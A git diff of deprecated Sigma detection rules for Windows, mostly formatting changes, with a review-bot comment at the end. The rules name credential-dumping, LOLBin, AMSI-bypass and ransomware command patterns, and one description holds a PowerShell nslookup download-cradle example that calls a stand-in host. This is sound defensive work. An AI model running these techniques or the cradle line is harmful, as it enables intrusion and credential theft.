-        - OriginalFileName: reg.exe
+        - NewProcessName|endswith: \reg.exe
+        - OriginalFileName: reg.exe
     selection_2:
-        CommandLine|contains:
+        CommandLine|contains:
             - ' save '
             - ' export '
     selection_3:
-        CommandLine|contains:
+        CommandLine|contains:
             - hklm\sam
             - hklm\security
             - HKEY_LOCAL_MACHINE\SAM
diff --git a/sigma/builtin/deprecated/proc_creation_win_cscript_vbs.yml b/sigma/builtin/deprecated/proc_creation_win_cscript_vbs.yml
index 3ec6e7f66..c3eed9b02 100644
--- a/sigma/builtin/deprecated/proc_creation_win_cscript_vbs.yml
+++ b/sigma/builtin/deprecated/proc_creation_win_cscript_vbs.yml
@@ -18,14 +18,14 @@ detection:
         EventID: 4688
         Channel: Security
     selection_exe:
-        - OriginalFileName:
-            - cscript.exe
-            - wscript.exe
-        - NewProcessName|endswith:
-            - \cscript.exe
-            - \wscript.exe
+        - OriginalFileName:
+            - cscript.exe
+            - wscript.exe
+        - NewProcessName|endswith:
+            - \cscript.exe
+            - \wscript.exe
     selection_script:
-        CommandLine|contains: .vbs
+        CommandLine|contains: .vbs
     condition: process_creation and (all of selection_*)
 falsepositives:
     - Unknown
diff --git a/sigma/builtin/deprecated/proc_creation_win_execution_mssql_xp_cmdshell_stored_procedure.yml b/sigma/builtin/deprecated/proc_creation_win_execution_mssql_xp_cmdshell_stored_procedure.yml
index ab4ad99fe..cde31411b 100644
--- a/sigma/builtin/deprecated/proc_creation_win_execution_mssql_xp_cmdshell_stored_procedure.yml
+++ b/sigma/builtin/deprecated/proc_creation_win_execution_mssql_xp_cmdshell_stored_procedure.yml
@@ -1,14 +1,12 @@
 title: Execution via MSSQL Xp_cmdshell Stored Procedure
 id: 344482e4-a477-436c-aa70-7536d18a48c7
 related:
-    - id: d08dd86f-681e-4a00-a92c-1db218754417
-      type: derived
-    - id: 7f103213-a04e-4d59-8261-213dddf22314
-      type: derived
+    - id: d08dd86f-681e-4a00-a92c-1db218754417
+      type: derived
+    - id: 7f103213-a04e-4d59-8261-213dddf22314
+      type: derived
 status: deprecated
-description: Detects execution via MSSQL xp_cmdshell stored procedure. Malicious users
-    may attempt to elevate their privileges by using xp_cmdshell, which is disabled
-    by default.
+description: Detects execution via MSSQL xp_cmdshell stored procedure. Malicious users may attempt to elevate their privileges by using xp_cmdshell, which is disabled by default.
 references:
     - https://www.elastic.co/guide/en/security/current/execution-via-mssql-xp_cmdshell-stored-procedure.html
 author: Tim Rauch
@@ -25,8 +23,8 @@ detection:
         EventID: 4688
         Channel: Security
     selection_img:
-        - NewProcessName|endswith: \cmd.exe
-        - OriginalFileName: Cmd.Exe
+        - NewProcessName|endswith: \cmd.exe
+        - OriginalFileName: Cmd.Exe
     selection_parent:
         ParentProcessName|endswith: \sqlservr.exe
     condition: process_creation and (all of selection_*)
diff --git a/sigma/builtin/deprecated/proc_creation_win_indirect_cmd.yml b/sigma/builtin/deprecated/proc_creation_win_indirect_cmd.yml
index b43cf6d47..afc86af29 100644
--- a/sigma/builtin/deprecated/proc_creation_win_indirect_cmd.yml
+++ b/sigma/builtin/deprecated/proc_creation_win_indirect_cmd.yml
@@ -1,8 +1,7 @@
 title: Indirect Command Execution
 id: fa47597e-90e9-41cd-ab72-c3b74cfb0d02
 status: deprecated
-description: Detect indirect command execution via Program Compatibility Assistant
-    (pcalua.exe or forfiles.exe).
+description: Detect indirect command execution via Program Compatibility Assistant (pcalua.exe or forfiles.exe).
 references:
     - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1202/T1202.md
     - https://eqllib.readthedocs.io/en/latest/analytics/884a7ccd-7305-4130-82d0-d4f90bc118b6.html
@@ -30,8 +29,7 @@ fields:
     - ParentCommandLine
     - CommandLine
 falsepositives:
-    - Need to use extra processing with 'unique_count' / 'filter' to focus on outliers
-        as opposed to commonly seen artifacts.
+    - Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts.
     - Legitimate usage of scripts.
 level: low
 ruletype: Sigma
diff --git a/sigma/builtin/deprecated/proc_creation_win_indirect_command_execution_forfiles.yml b/sigma/builtin/deprecated/proc_creation_win_indirect_command_execution_forfiles.yml
index e7400f147..0610cf5b6 100644
--- a/sigma/builtin/deprecated/proc_creation_win_indirect_command_execution_forfiles.yml
+++ b/sigma/builtin/deprecated/proc_creation_win_indirect_command_execution_forfiles.yml
@@ -1,16 +1,14 @@
 title: Indirect Command Exectuion via Forfiles
 id: a85cf4e3-56ee-4e79-adeb-789f8fb209a8
 related:
-    - id: fa47597e-90e9-41cd-ab72-c3b74cfb0d02
-      type: obsoletes
+    - id: fa47597e-90e9-41cd-ab72-c3b74cfb0d02
+      type: obsoletes
 status: deprecated
-description: Detects execition of commands and binaries from the context of "forfiles.exe".
-    This can be used as a LOLBIN in order to bypass application whitelisting.
+description: Detects execition of commands and binaries from the context of "forfiles.exe". This can be used as a LOLBIN in order to bypass application whitelisting.
 references:
     - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-73d61931b2c77fde294189ce5d62323b416296a7c23ea98a608f425566538d1a
     - https://lolbas-project.github.io/lolbas/Binaries/Forfiles/
-author: Tim Rauch (rule), Elastic (idea), E.M. Anhaus (originally from Atomic Blue
-    Detections, Endgame), oscd.community
+author: Tim Rauch (rule), Elastic (idea), E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
 date: 2022/10/17
 modified: 2023/01/04
 tags:
@@ -38,10 +36,10 @@ detection:
             - ' /m '
             - ' -m '
     filter:
-        CommandLine|contains|all:
+        CommandLine|contains|all:
             - xcopy
             - cmd /c del
-        NewProcessName|endswith: \cmd.exe
+        NewProcessName|endswith: \cmd.exe
     condition: process_creation and (all of selection_* and not filter)
 falsepositives:
     - Unknown
diff --git a/sigma/builtin/deprecated/proc_creation_win_invoke_obfuscation_via_rundll.yml b/sigma/builtin/deprecated/proc_creation_win_invoke_obfuscation_via_rundll.yml
index dbc723e5c..6d53806a4 100644
--- a/sigma/builtin/deprecated/proc_creation_win_invoke_obfuscation_via_rundll.yml
+++ b/sigma/builtin/deprecated/proc_creation_win_invoke_obfuscation_via_rundll.yml
@@ -3,7 +3,7 @@ id: 056a7ee1-4853-4e67-86a0-3fd9ceed7555
 status: deprecated
 description: Detects Obfuscated Powershell via RUNDLL LAUNCHER
 references:
-    - https://github.com/SigmaHQ/sigma/issues/1009
+    - https://github.com/SigmaHQ/sigma/issues/1009 #(Task 23)
 author: Timur Zinniatullin, oscd.community
 date: 2020/10/18
 modified: 2023/02/21
@@ -20,7 +20,7 @@ detection:
         EventID: 4688
         Channel: Security
     selection:
-        CommandLine|contains|all:
+        CommandLine|contains|all:
             - rundll32.exe
             - shell32.dll
             - shellexec_rundll
diff --git a/sigma/builtin/deprecated/proc_creation_win_invoke_obfuscation_via_use_rundll32.yml b/sigma/builtin/deprecated/proc_creation_win_invoke_obfuscation_via_use_rundll32.yml
index 33dcef79f..557299157 100644
--- a/sigma/builtin/deprecated/proc_creation_win_invoke_obfuscation_via_use_rundll32.yml
+++ b/sigma/builtin/deprecated/proc_creation_win_invoke_obfuscation_via_use_rundll32.yml
@@ -20,12 +20,12 @@ detection:
         EventID: 4688
         Channel: Security
     selection:
-        CommandLine|contains|all:
+        CommandLine|contains|all:
             - '&&'
             - rundll32
             - shell32.dll
             - shellexec_rundll
-        CommandLine|contains:
+        CommandLine|contains:
             - value
             - invoke
             - comspec
diff --git a/sigma/builtin/deprecated/proc_creation_win_lolbas_execution_of_wuauclt.yml b/sigma/builtin/deprecated/proc_creation_win_lolbas_execution_of_wuauclt.yml
index d0fc2f226..53f8e6361 100644
--- a/sigma/builtin/deprecated/proc_creation_win_lolbas_execution_of_wuauclt.yml
+++ b/sigma/builtin/deprecated/proc_creation_win_lolbas_execution_of_wuauclt.yml
@@ -1,8 +1,7 @@
 title: Monitoring Wuauclt.exe For Lolbas Execution Of DLL
 id: ba1bb0cb-73da-42de-ad3a-de10c643a5d0
 status: experimental
-description: Adversaries can abuse wuauclt.exe (Windows Update client) to run code
-    execution by specifying an arbitrary DLL.
+description: Adversaries can abuse wuauclt.exe (Windows Update client) to run code execution by specifying an arbitrary DLL.
 references:
     - https://dtm.uk/wuauclt/
 author: Sreeman
@@ -16,12 +15,12 @@ detection:
         EventID: 4688
         Channel: Security
     selection:
-        CommandLine|contains|all:
+        CommandLine|contains|all:
             - wuauclt.exe
             - /UpdateDeploymentProvider
             - /Runhandlercomserver
     filter:
-        CommandLine|contains:
+        CommandLine|contains:
             - wuaueng.dll
             - UpdateDeploymentProvider.dll /ClassId
     condition: process_creation and (selection and not filter)
diff --git a/sigma/builtin/deprecated/proc_creation_win_lolbin_findstr.yml b/sigma/builtin/deprecated/proc_creation_win_lolbin_findstr.yml
index 3c829348b..cc138bcd9 100644
--- a/sigma/builtin/deprecated/proc_creation_win_lolbin_findstr.yml
+++ b/sigma/builtin/deprecated/proc_creation_win_lolbin_findstr.yml
@@ -1,8 +1,7 @@
 title: Abusing Findstr for Defense Evasion
 id: bf6c39fc-e203-45b9-9538-05397c1b4f3f
 status: deprecated
-description: Attackers can use findstr to hide their artifacts or search specific
-    strings and evade defense mechanism
+description: Attackers can use findstr to hide their artifacts or search specific strings and evade defense mechanism
 references:
     - https://lolbas-project.github.io/lolbas/Binaries/Findstr/
     - https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
@@ -24,27 +23,26 @@ detection:
         EventID: 4688
         Channel: Security
     selection_findstr:
-        - CommandLine|contains: findstr
-        - NewProcessName|endswith: findstr.exe
-        - OriginalFileName: FINDSTR.EXE
+        - CommandLine|contains: findstr
+        - NewProcessName|endswith: findstr.exe
+        - OriginalFileName: FINDSTR.EXE
     selection_cli_download_1:
-        CommandLine|contains:
+        CommandLine|contains:
             - ' /v '
             - ' -v '
     selection_cli_download_2:
-        CommandLine|contains:
+        CommandLine|contains:
             - ' /l '
             - ' -l '
     selection_cli_creds_1:
-        CommandLine|contains:
+        CommandLine|contains:
             - ' /s '
             - ' -s '
     selection_cli_creds_2:
-        CommandLine|contains:
+        CommandLine|contains:
             - ' /i '
             - ' -i '
-    condition: process_creation and (selection_findstr and (all of selection_cli_download*
-        or all of selection_cli_creds*))
+    condition: process_creation and (selection_findstr and (all of selection_cli_download* or all of selection_cli_creds*))
 falsepositives:
     - Administrative findstr usage
 level: medium
diff --git a/sigma/builtin/deprecated/proc_creation_win_lolbin_office.yml b/sigma/builtin/deprecated/proc_creation_win_lolbin_office.yml
index 918a4e359..776dc82c5 100644
--- a/sigma/builtin/deprecated/proc_creation_win_lolbin_office.yml
+++ b/sigma/builtin/deprecated/proc_creation_win_lolbin_office.yml
@@ -1,8 +1,7 @@
 title: Suspicious File Download Using Office Application
 id: 0c79148b-118e-472b-bdb7-9b57b444cc19
 status: test
-description: Detects the usage of one of three Microsoft office applications (Word,
-    Excel, PowerPoint) to download arbitrary files
+description: Detects the usage of one of three Microsoft office applications (Word, Excel, PowerPoint) to download arbitrary files
 references:
     - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/
     - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Excel/
@@ -22,8 +21,8 @@ detection:
         EventID: 4688
         Channel: Security
     selection:
-        CommandLine|contains: http
-        NewProcessName|endswith:
+        CommandLine|contains: http
+        NewProcessName|endswith:
             - \powerpnt.exe
             - \winword.exe
             - \excel.exe
diff --git a/sigma/builtin/deprecated/proc_creation_win_lolbin_rdrleakdiag.yml b/sigma/builtin/deprecated/proc_creation_win_lolbin_rdrleakdiag.yml
index 99034af28..7641db507 100644
--- a/sigma/builtin/deprecated/proc_creation_win_lolbin_rdrleakdiag.yml
+++ b/sigma/builtin/deprecated/proc_creation_win_lolbin_rdrleakdiag.yml
@@ -19,10 +19,10 @@ detection:
         EventID: 4688
         Channel: Security
     selection1:
-        CommandLine|contains: /fullmemdmp
-        NewProcessName|endswith: \rdrleakdiag.exe
+        CommandLine|contains: /fullmemdmp
+        NewProcessName|endswith: \rdrleakdiag.exe
     selection2:
-        CommandLine|contains|all:
+        CommandLine|contains|all:
             - /fullmemdmp
             - ' /o '
             - ' /p '
diff --git a/sigma/builtin/deprecated/proc_creation_win_lolbins_by_office_applications.yml b/sigma/builtin/deprecated/proc_creation_win_lolbins_by_office_applications.yml
index 9ecd13ca4..4dad5de5e 100644
--- a/sigma/builtin/deprecated/proc_creation_win_lolbins_by_office_applications.yml
+++ b/sigma/builtin/deprecated/proc_creation_win_lolbins_by_office_applications.yml
@@ -1,8 +1,7 @@
 title: New Lolbin Process by Office Applications
 id: 23daeb52-e6eb-493c-8607-c4f0246cb7d8
 status: deprecated
-description: This rule will monitor any office apps that spins up a new LOLBin process.
-    This activity is pretty suspicious and should be investigated.
+description: This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated.
 references:
     - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/
     - https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e
@@ -10,8 +9,7 @@ references:
     - https://github.com/splunk/security_content/blob/develop/detections/endpoint/office_spawning_control.yml
     - https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A
     - https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set
-author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Michael Haag, Christopher Peacock
-    @securepeacock (Update), SCYTHE @scythe_io (Update)
+author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Michael Haag, Christopher Peacock @securepeacock (Update), SCYTHE @scythe_io (Update)
 date: 2021/08/23
 modified: 2023/02/04
 tags:
@@ -24,11 +22,12 @@ logsource:
     product: windows
     category: process_creation
 detection:
+    #useful_information: add more LOLBins to the rules logic of your choice.
     process_creation:
         EventID: 4688
         Channel: Security
     selection:
-        NewProcessName|endswith:
+        NewProcessName|endswith:
             - \regsvr32.exe
             - \rundll32.exe
             - \msiexec.exe
diff --git a/sigma/builtin/deprecated/proc_creation_win_mal_ryuk.yml b/sigma/builtin/deprecated/proc_creation_win_mal_ryuk.yml
index 03b601edb..a1027ebb6 100644
--- a/sigma/builtin/deprecated/proc_creation_win_mal_ryuk.yml
+++ b/sigma/builtin/deprecated/proc_creation_win_mal_ryuk.yml
@@ -1,8 +1,8 @@
 title: Ryuk Ransomware Command Line Activity
 id: 0acaad27-9f02-4136-a243-c357202edd74
 related:
-    - id: c37510b8-2107-4b78-aa32-72f251e7a844
-      type: similar
+    - id: c37510b8-2107-4b78-aa32-72f251e7a844
+      type: similar
 status: deprecated
 description: Detects Ryuk Ransomware command lines
 references:
@@ -21,12 +21,12 @@ detection:
         EventID: 4688
         Channel: Security
     selection1:
-        CommandLine|contains: stop
-        NewProcessName|endswith:
+        CommandLine|contains: stop
+        NewProcessName|endswith:
             - \net.exe
             - \net1.exe
     selection2:
-        CommandLine|contains:
+        CommandLine|contains:
             - samss
             - audioendpointbuilder
             - unistoresvc_
diff --git a/sigma/builtin/deprecated/proc_creation_win_malware_trickbot_recon_activity.yml b/sigma/builtin/deprecated/proc_creation_win_malware_trickbot_recon_activity.yml
index 79e8917c7..74518c7cb 100644
--- a/sigma/builtin/deprecated/proc_creation_win_malware_trickbot_recon_activity.yml
+++ b/sigma/builtin/deprecated/proc_creation_win_malware_trickbot_recon_activity.yml
@@ -1,12 +1,10 @@
 title: Trickbot Malware Reconnaissance Activity
 id: 410ad193-a728-4107-bc79-4419789fcbf8
 related:
-    - id: 5cc90652-4cbd-4241-aa3b-4b462fa5a248
-      type: similar
+    - id: 5cc90652-4cbd-4241-aa3b-4b462fa5a248
+      type: similar
 status: deprecated
-description: Detects potential reconnaissance activity used by Trickbot malware. Trickbot
-    enumerates domain/network topology and executes certain commands automatically
-    every few minutes.
+description: Detects potential reconnaissance activity used by Trickbot malware. Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes.
 references:
     - https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/
     - https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/
@@ -24,9 +22,9 @@ detection:
         EventID: 4688
         Channel: Security
     selection:
-        CommandLine|contains: /domain_trusts /all_trusts
+        CommandLine|contains: /domain_trusts /all_trusts
         ParentProcessName|endswith: \cmd.exe
-        NewProcessName|endswith: \nltest.exe
+        NewProcessName|endswith: \nltest.exe
     condition: process_creation and selection
 falsepositives:
     - Rare System Admin Activity
diff --git a/sigma/builtin/deprecated/proc_creation_win_mavinject_proc_inj.yml b/sigma/builtin/deprecated/proc_creation_win_mavinject_proc_inj.yml
index 9db811396..891295519 100644
--- a/sigma/builtin/deprecated/proc_creation_win_mavinject_proc_inj.yml
+++ b/sigma/builtin/deprecated/proc_creation_win_mavinject_proc_inj.yml
@@ -20,7 +20,7 @@ detection:
         EventID: 4688
         Channel: Security
     selection:
-        CommandLine|contains: ' /INJECTRUNNING '
+        CommandLine|contains: ' /INJECTRUNNING '
     condition: process_creation and selection
 falsepositives:
     - Unknown
diff --git a/sigma/builtin/deprecated/proc_creation_win_msdt_diagcab.yml b/sigma/builtin/deprecated/proc_creation_win_msdt_diagcab.yml
index b55e3365b..47767c955 100644
--- a/sigma/builtin/deprecated/proc_creation_win_msdt_diagcab.yml
+++ b/sigma/builtin/deprecated/proc_creation_win_msdt_diagcab.yml
@@ -1,8 +1,7 @@
 title: Execute MSDT.EXE Using Diagcab File
 id: 6545ce61-a1bd-4119-b9be-fcbee42c0cf3
 status: deprecated
-description: Detects diagcab leveraging the "ms-msdt" handler or the "msdt.exe" binary
-    to execute arbitrary commands as seen in CVE-2022-30190
+description: Detects diagcab leveraging the "ms-msdt" handler or the "msdt.exe" binary to execute arbitrary commands as seen in CVE-2022-30190
 references:
     - https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab
     - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-9015912909545e72ed42cbac4d1e96295e8964579c406d23fd9c47a8091576a0
@@ -21,10 +20,10 @@ detection:
         EventID: 4688
         Channel: Security
     selection_img:
-        - NewProcessName|endswith: \msdt.exe
-        - OriginalFileName: msdt.exe
+        - NewProcessName|endswith: \msdt.exe
+        - OriginalFileName: msdt.exe
     selection_cmd:
-        CommandLine|contains:
+        CommandLine|contains:
             - ' /cab'
             - ' -cab'
     condition: process_creation and (all of selection_*)
diff --git a/sigma/builtin/deprecated/proc_creation_win_new_service_creation.yml b/sigma/builtin/deprecated/proc_creation_win_new_service_creation.yml
index f31be5f54..507e52d18 100644
--- a/sigma/builtin/deprecated/proc_creation_win_new_service_creation.yml
+++ b/sigma/builtin/deprecated/proc_creation_win_new_service_creation.yml
@@ -19,12 +19,12 @@ detection: EventID: 4688 Channel: Security selection_sc: - CommandLine|contains|all: + CommandLine|contains|all: - create - binPath - NewProcessName|endswith: \sc.exe + NewProcessName|endswith: \sc.exe selection_posh: - CommandLine|contains|all: + CommandLine|contains|all: - New-Service - -BinaryPathName condition: process_creation and (1 of selection*) diff --git a/sigma/builtin/deprecated/proc_creation_win_nslookup_pwsh_download_cradle.yml b/sigma/builtin/deprecated/proc_creation_win_nslookup_pwsh_download_cradle.yml index 66d0b2337..1fbb4098f 100644 --- a/sigma/builtin/deprecated/proc_creation_win_nslookup_pwsh_download_cradle.yml +++ b/sigma/builtin/deprecated/proc_creation_win_nslookup_pwsh_download_cradle.yml @@ -1,13 +1,12 @@ title: Nslookup PwSh Download Cradle id: 72671447-4352-4413-bb91-b85569687135 status: deprecated -description: This rule tries to detect powershell download cradles, e.g. powershell - . (nslookup -q=txt http://some.owned.domain.com)[-1] +description: This rule tries to detect powershell download cradles, e.g. powershell . (nslookup -q=txt http://some.owned.domain.com)[-1] references: - https://twitter.com/alh4zr3d/status/1566489367232651264 author: Zach Mathis (@yamatosecurity) date: 2022/09/06 -modified: 2022/12/14 +modified: 2022/12/14 # Deprecation date tags: - attack.command_and_control - attack.t1105 @@ -20,9 +19,9 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: '=txt ' + CommandLine|contains: '=txt ' ParentProcessName|endswith: \powershell.exe - NewProcessName|contains: nslookup + NewProcessName|contains: nslookup condition: process_creation and selection level: medium ruletype: Sigma diff --git a/sigma/builtin/deprecated/proc_creation_win_odbcconf_susp_exec.yml b/sigma/builtin/deprecated/proc_creation_win_odbcconf_susp_exec.yml index 0033c3d73..05c5cab7c 100644 --- a/sigma/builtin/deprecated/proc_creation_win_odbcconf_susp_exec.yml 
+++ b/sigma/builtin/deprecated/proc_creation_win_odbcconf_susp_exec.yml @@ -21,10 +21,10 @@ detection: EventID: 4688 Channel: Security selection_1_img: - - NewProcessName|endswith: \odbcconf.exe - - OriginalFileName: odbcconf.exe + - NewProcessName|endswith: \odbcconf.exe + - OriginalFileName: odbcconf.exe selection_1_cli: - CommandLine|contains: + CommandLine|contains: - -a - -f - /a @@ -33,8 +33,8 @@ detection: selection_2_parent: ParentProcessName|endswith: \odbcconf.exe selection_2_img: - - NewProcessName|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - NewProcessName|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE condition: process_creation and (all of selection_1_* or all of selection_2_*) falsepositives: - Legitimate use of odbcconf.exe by legitimate user diff --git a/sigma/builtin/deprecated/proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml b/sigma/builtin/deprecated/proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml index bad4c2761..d2f34387b 100644 --- a/sigma/builtin/deprecated/proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml +++ b/sigma/builtin/deprecated/proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml 
@@ -1,17 +1,11 @@ title: Excel Proxy Executing Regsvr32 With Payload id: 9d1c72f5-43f0-4da5-9320-648cf2099dd0 status: deprecated -description: 'Excel called wmic to finally proxy execute regsvr32 with the payload. - +description: | + Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin). - - But we have command-line in the event which allow us to "restore" this suspicious - parent-child chain and detect it. - - Monitor process creation with "wmic process call create" and LOLBins in command-line - with parent Office application processes. - - ' + But we have command-line in the event which allow us to "restore" this suspicious parent-child chain and detect it. + Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml @@ -28,20 +22,21 @@ logsource: product: windows category: process_creation detection: + #useful_information: add more LOLBins to the rules logic of your choice. process_creation: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \wbem\WMIC.exe - - OriginalFileName: wmic.exe + - NewProcessName|endswith: \wbem\WMIC.exe + - OriginalFileName: wmic.exe selection_other: - CommandLine|contains: + CommandLine|contains: - regsvr32 - rundll32 - msiexec - mshta - verclsid - CommandLine|contains|all: + CommandLine|contains|all: - process - create - call diff --git a/sigma/builtin/deprecated/proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml b/sigma/builtin/deprecated/proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml index 41b4c3100..087eabaa7 100644 
--- a/sigma/builtin/deprecated/proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml +++ b/sigma/builtin/deprecated/proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml @@ -1,17 +1,11 @@ title: Excel Proxy Executing Regsvr32 With Payload Alternate id: c0e1c3d5-4381-4f18-8145-2583f06a1fe5 status: deprecated -description: 'Excel called wmic to finally proxy execute regsvr32 with the payload. - +description: | + Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin). - - But we have command-line in the event which allow us to "restore" this suspicious - parent-child chain and detect it. - - Monitor process creation with "wmic process call create" and LOLBins in command-line - with parent Office application processes. - - ' + But we have command-line in the event which allow us to "restore" this suspicious parent-child chain and detect it. + Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml 
@@ -28,26 +22,27 @@ logsource: product: windows category: process_creation detection: + #useful_information: add more LOLBins to the rules logic of your choice. process_creation: EventID: 4688 Channel: Security selection1: - CommandLine|contains: + CommandLine|contains: - regsvr32 - rundll32 - msiexec - mshta - verclsid selection2: - - NewProcessName|endswith: \wbem\WMIC.exe - - CommandLine|contains: 'wmic ' + - NewProcessName|endswith: \wbem\WMIC.exe + - CommandLine|contains: 'wmic ' selection3: ParentProcessName|endswith: - \winword.exe - \excel.exe - \powerpnt.exe selection4: - CommandLine|contains|all: + CommandLine|contains|all: - process - create - call diff --git a/sigma/builtin/deprecated/proc_creation_win_office_spawning_wmi_commandline.yml b/sigma/builtin/deprecated/proc_creation_win_office_spawning_wmi_commandline.yml index f98a1ea4a..cca7a403b 100644 --- a/sigma/builtin/deprecated/proc_creation_win_office_spawning_wmi_commandline.yml +++ b/sigma/builtin/deprecated/proc_creation_win_office_spawning_wmi_commandline.yml @@ -1,8 +1,7 @@ title: Office Applications Spawning Wmi Cli Alternate id: 04f5363a-6bca-42ff-be70-0d28bf629ead status: deprecated -description: Initial execution of malicious document calls wmic to execute the file - with regsvr32 +description: Initial execution of malicious document calls wmic to execute the file with regsvr32 references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml 
@@ -19,12 +18,13 @@ logsource: product: windows category: process_creation detection: + #useful_information: Add more office applications to the rule logic of choice process_creation: EventID: 4688 Channel: Security selection1: - - NewProcessName|endswith: \wbem\WMIC.exe - - CommandLine|contains: 'wmic ' + - NewProcessName|endswith: \wbem\WMIC.exe + - CommandLine|contains: 'wmic ' selection2: ParentProcessName|endswith: - \winword.exe diff --git a/sigma/builtin/deprecated/proc_creation_win_possible_applocker_bypass.yml b/sigma/builtin/deprecated/proc_creation_win_possible_applocker_bypass.yml index a4ad6e1f8..e05210ee9 100644 --- a/sigma/builtin/deprecated/proc_creation_win_possible_applocker_bypass.yml +++ b/sigma/builtin/deprecated/proc_creation_win_possible_applocker_bypass.yml @@ -1,8 +1,7 @@ title: Possible Applocker Bypass id: 82a19e3a-2bfe-4a91-8c0d-5d4c98fbb719 status: deprecated -description: Detects execution of executables that can be used to bypass Applocker - whitelisting +description: Detects execution of executables that can be used to bypass Applocker whitelisting references: - https://github.com/carnal0wnage/ApplicationWhitelistBypassTechniques/blob/b348846a3bd2ff45e3616d63a4c2b4426f84772c/TheList.txt - https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/ @@ -16,7 +15,7 @@ tags: - attack.t1218.009 - attack.t1127.001 - attack.t1218.005 - - attack.t1218 + - attack.t1218 # no way to map 1:1, so the technique level is required logsource: category: process_creation product: windows 
@@ -25,18 +24,19 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - \msdt.exe - \installutil.exe - \regsvcs.exe - \regasm.exe + #- '\regsvr32.exe' # too many FPs, very noisy - \msbuild.exe - \ieexec.exe + #- '\mshta.exe' + #- '\csc.exe' condition: process_creation and selection falsepositives: - - False positives depend on scripts and administrative tools used in the monitored - environment - - Using installutil to add features for .NET applications (primarily would occur - in developer environments) + - False positives depend on scripts and administrative tools used in the monitored environment + - Using installutil to add features for .NET applications (primarily would occur in developer environments) level: low ruletype: Sigma diff --git a/sigma/builtin/deprecated/proc_creation_win_powershell_amsi_bypass_pattern_nov22.yml b/sigma/builtin/deprecated/proc_creation_win_powershell_amsi_bypass_pattern_nov22.yml index 9102e52e3..fdf71a4fa 100644 --- a/sigma/builtin/deprecated/proc_creation_win_powershell_amsi_bypass_pattern_nov22.yml +++ b/sigma/builtin/deprecated/proc_creation_win_powershell_amsi_bypass_pattern_nov22.yml @@ -1,8 +1,7 @@ title: PowerShell AMSI Bypass Pattern id: 4f927692-68b5-4267-871b-073c45f4f6fe status: deprecated -description: Detects attempts to disable AMSI in the command line. It is possible - to bypass AMSI by disabling it before loading the main payload. +description: Detects attempts to disable AMSI in the command line. It is possible to bypass AMSI by disabling it before loading the main payload. author: '@Kostastsale' references: - https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/ 
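Review bot: The two new placeholder entries `#- '\mshta.exe'` and `#- '\csc.exe'` under `CommandLine|contains` in the second hunk carry no reason, unlike the neighbouring `#- '\regsvr32.exe' # too many FPs, very noisy`, so a later maintainer cannot tell whether they were excluded for noise or simply never evaluated. Either annotate them the same way, e.g. `#- '\mshta.exe' # excluded: <reason placeholder>`, or drop them, since the rule is already deprecated and dead candidates only add confusion. Note also that the live entries are unquoted while the commented ones are single-quoted; if any are ever re-enabled they should follow the list's style.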
